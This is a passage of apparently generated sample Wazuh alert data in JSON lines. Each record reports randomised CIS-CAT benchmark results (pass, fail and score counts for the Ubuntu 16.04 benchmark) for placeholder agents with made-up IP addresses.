4","notchecked":2,"score":87,"pass":17,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":28,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 5","id":"1059","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":94,"rule_title":"CIS-CAT 3","notchecked":3,"score":98,"pass":41,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":58,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 4","id":"531","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":96,"rule_title":"CIS-CAT 6","notchecked":3,"score":8,"pass":97,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":95,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 1","id":"986","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":39,"rule_title":"CIS-CAT 6","notchecked":4,"score":51,"pass":96,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":95,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 5","id":"3810","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":66,"rule_title":"CIS-CAT 1","notchecked":3,"score":84,"pass":91,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":95,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 1","id":"3495","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":74,"rule_title":"CIS-CAT 6","notchecked":0,"score":34,"pass":53,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":8,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 1","id":"116","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":99,"rule_title":"CIS-CAT 4","notchecked":1,"score":46,"pass":28,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":14,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 3","id":"3857","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":19,"rule_title":"CIS-CAT 3","notchecked":0,"score":7,"pass":27,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":88,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":1,"description":"Sample alert 2","id":"86","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":2,"rule_title":"CIS-CAT 4","notchecked":1,"score":30,"pass":41,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":28,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":11,"description":"Sample alert 3","id":"730","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":18,"rule_title":"CIS-CAT 5","notchecked":1,"score":60,"pass":75,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":77,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":6,"description":"Sample alert 2","id":"5482","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":16,"rule_title":"CIS-CAT 3","notchecked":1,"score":60,"pass":93,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":76,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 5","id":"5587","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":67,"rule_title":"CIS-CAT 3","notchecked":5,"score":7,"pass":48,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":97,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 2","id":"2761","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":92,"rule_title":"CIS-CAT 3","notchecked":3,"score":25,"pass":36,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":76,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":11,"description":"Sample alert 4","id":"3750","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":67,"rule_title":"CIS-CAT 6","notchecked":4,"score":44,"pass":73,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":3,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 4","id":"4685","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":2,"rule_title":"CIS-CAT 4","notchecked":3,"score":32,"pass":44,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":34,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 3","id":"1858","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":40,"rule_title":"CIS-CAT 4","notchecked":0,"score":98,"pass":12,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":62,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 1","id":"1740","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":0,"rule_title":"CIS-CAT 5","notchecked":1,"score":79,"pass":52,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":61,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 5","id":"4761","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":88,"rule_title":"CIS-CAT 1","notchecked":2,"score":8,"pass":58,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":21,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":11,"description":"Sample alert 5","id":"3621","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":9,"rule_title":"CIS-CAT 2","notchecked":5,"score":76,"pass":86,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":55,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 5","id":"5004","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":83,"rule_title":"CIS-CAT 5","notchecked":0,"score":45,"pass":34,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":17,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 3","id":"3909","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":91,"rule_title":"CIS-CAT 5","notchecked":3,"score":12,"pass":45,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":86,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 1","id":"940","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":57,"rule_title":"CIS-CAT 4","notchecked":1,"score":20,"pass":49,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":83,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 5","id":"5026","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":48,"rule_title":"CIS-CAT 6","notchecked":1,"score":5,"pass":46,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":6,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 4","id":"2301","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":68,"rule_title":"CIS-CAT 1","notchecked":5,"score":89,"pass":81,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":40,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 5","id":"4721","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":76,"rule_title":"CIS-CAT 1","notchecked":0,"score":13,"pass":59,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":23,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 2","id":"939","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":7,"rule_title":"CIS-CAT 1","notchecked":5,"score":5,"pass":76,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":55,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":1,"description":"Sample alert 1","id":"3683","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":55,"rule_title":"CIS-CAT 1","notchecked":1,"score":32,"pass":77,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":99,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 4","id":"4425","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":70,"rule_title":"CIS-CAT 5","notchecked":5,"score":68,"pass":60,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":96,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 5","id":"4845","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":87,"rule_title":"CIS-CAT 4","notchecked":1,"score":31,"pass":42,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":3,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 5","id":"4602","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":99,"rule_title":"CIS-CAT 2","notchecked":3,"score":17,"pass":25,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":68,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 2","id":"5863","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":1,"rule_title":"CIS-CAT 6","notchecked":3,"score":2,"pass":44,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":90,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 5","id":"3899","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":12,"rule_title":"CIS-CAT 2","notchecked":1,"score":68,"pass":60,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":88,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 3","id":"5802","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":68,"rule_title":"CIS-CAT 4","notchecked":3,"score":8,"pass":76,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":52,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 5","id":"2553","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":31,"rule_title":"CIS-CAT 5","notchecked":1,"score":71,"pass":74,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":96,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 3","id":"5515","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":67,"rule_title":"CIS-CAT 1","notchecked":4,"score":91,"pass":21,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":12,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 2","id":"3519","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":20,"rule_title":"CIS-CAT 6","notchecked":2,"score":62,"pass":79,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":42,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 4","id":"4891","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":46,"rule_title":"CIS-CAT 3","notchecked":3,"score":9,"pass":41,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":57,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 5","id":"4265","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":20,"rule_title":"CIS-CAT 2","notchecked":3,"score":48,"pass":12,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":45,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 2","id":"5205","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":98,"rule_title":"CIS-CAT 6","notchecked":1,"score":97,"pass":63,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":60,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 5","id":"507","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":58,"rule_title":"CIS-CAT 5","notchecked":0,"score":0,"pass":14,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":21,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 1","id":"3796","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":7,"rule_title":"CIS-CAT 6","notchecked":5,"score":18,"pass":11,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":46,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 4","id":"5794","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":20,"rule_title":"CIS-CAT 5","notchecked":3,"score":60,"pass":63,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":55,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":6,"description":"Sample alert 4","id":"188","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":6,"rule_title":"CIS-CAT 4","notchecked":0,"score":2,"pass":92,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":14,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 3","id":"2333","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":65,"rule_title":"CIS-CAT 3","notchecked":0,"score":49,"pass":25,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":78,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 5","id":"2835","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":94,"rule_title":"CIS-CAT 3","notchecked":1,"score":53,"pass":41,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":23,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":6,"description":"Sample alert 3","id":"5915","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":99,"rule_title":"CIS-CAT 1","notchecked":2,"score":36,"pass":38,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":60,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 5","id":"5311","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":58,"rule_title":"CIS-CAT 3","notchecked":4,"score":29,"pass":17,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":28,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 5","id":"4972","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":44,"rule_title":"CIS-CAT 3","notchecked":3,"score":27,"pass":23,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":18,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 4","id":"3913","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":71,"rule_title":"CIS-CAT 6","notchecked":2,"score":22,"pass":77,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":75,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 4","id":"3530","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":2,"rule_title":"CIS-CAT 1","notchecked":0,"score":22,"pass":64,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":11,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 1","id":"434","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":30,"rule_title":"CIS-CAT 